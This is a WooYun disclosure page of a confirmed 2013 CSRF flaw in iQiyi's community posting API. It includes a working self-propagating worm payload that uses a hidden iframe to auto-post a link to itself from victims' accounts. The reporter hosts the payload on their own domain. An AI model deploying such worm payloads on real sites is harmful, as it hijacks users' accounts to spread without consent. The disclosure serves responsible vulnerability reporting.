当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036391

漏洞标题:奇艺社区CSRF可构造蠕虫

相关厂商:奇艺

漏洞作者: LaiX

提交时间:2013-09-10 13:46

修复时间:2013-10-25 13:47

公开时间:2013-10-25 13:47

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-10: 细节已通知厂商并且等待厂商处理中
2013-09-10: 厂商已经确认,细节仅向厂商公开
2013-09-20: 细节向核心白帽子及相关领域专家公开
2013-09-30: 细节向普通白帽子公开
2013-10-10: 细节向实习白帽子公开
2013-10-25: 细节向公众公开

简要描述:

在发展业务的同时也注意以下CSRF撒

详细说明:

问题应用:

http://t.iqiyi.com/home

漏洞证明:

发表"奇谈"的时候抓到了这个地址:

http://t.iqiyi.com/api/feed/addChat.php


没有token或者其他的随机参数。
POST参数中:

<input type="hidden" name="requestMethod" value="POST">
<input type="hidden" name="requestURL" value="http" value="//t.iqiyi.com/api/feed/addChat.php">
<input type="hidden" name="notsync" value="">
<input type="hidden" name="categoryid" value="">
<input type="hidden" name="picid" value="">
<input type="hidden" name="txt" value="test">
<input type="hidden" name="tvid" value="0">
<input type="hidden" name="cb" value="qitan_response_data">
<input type="submit" value="ok">


构造一个payload:(http://cnhk.ml/qiyi/send.html)

<meta http-equiv="content-type" content="text/html;charset=utf-8">
<h1>正在跳转...</h1>
<iframe id="test_iframe" style='display:none'></iframe>
<script>
function CSRF()
{
//
test_iframe.document.write("<form id='test_form' action='http://t.iqiyi.com/api/feed/addChat.php' method='post' >"
+"<input type='hidden' name='requestMethod' value='POST'>"
+"<input type='hidden' name='requestURL' value='http' value='//t.iqiyi.com/api/feed/addChat.php'>"
+"<input type='hidden' name='notsync' value=''>"
+"<input type='hidden' name='categoryid' value=''>"
+"<input type='hidden' name='picid' value=''>"
+"<input type='hidden' name='txt' value='推荐一个好东西 http://cnhk.ml/qiyi/send.html'>"
+"<input type='hidden' name='tvid' value='0'>"
+"<input type='hidden' name='cb' value='qitan_response_data'>"
+"<input type='submit' value='ok'>"
+"</form>"
+"<script>document.getElementById('test_form').submit();<\/script>"
)
}
CSRF();
window.setTimeout("window.location.href='http://threejs.org/'", 5000)//延迟二秒后跳转到指定网页
</script>


当用户访问之后:

.png


然后其他的用户看到点击之后继续发消息,构成蠕虫攻击...

修复方案:

控制访问来源

版权声明:转载请注明来源 LaiX@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-09-10 14:02

厂商回复:

谢谢提供!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-10-25 14:09 | big、face ( 普通白帽子 | Rank:144 漏洞数:36 | |上天请赐我一个洞|想要一件乌云衣服|)

    彪悍!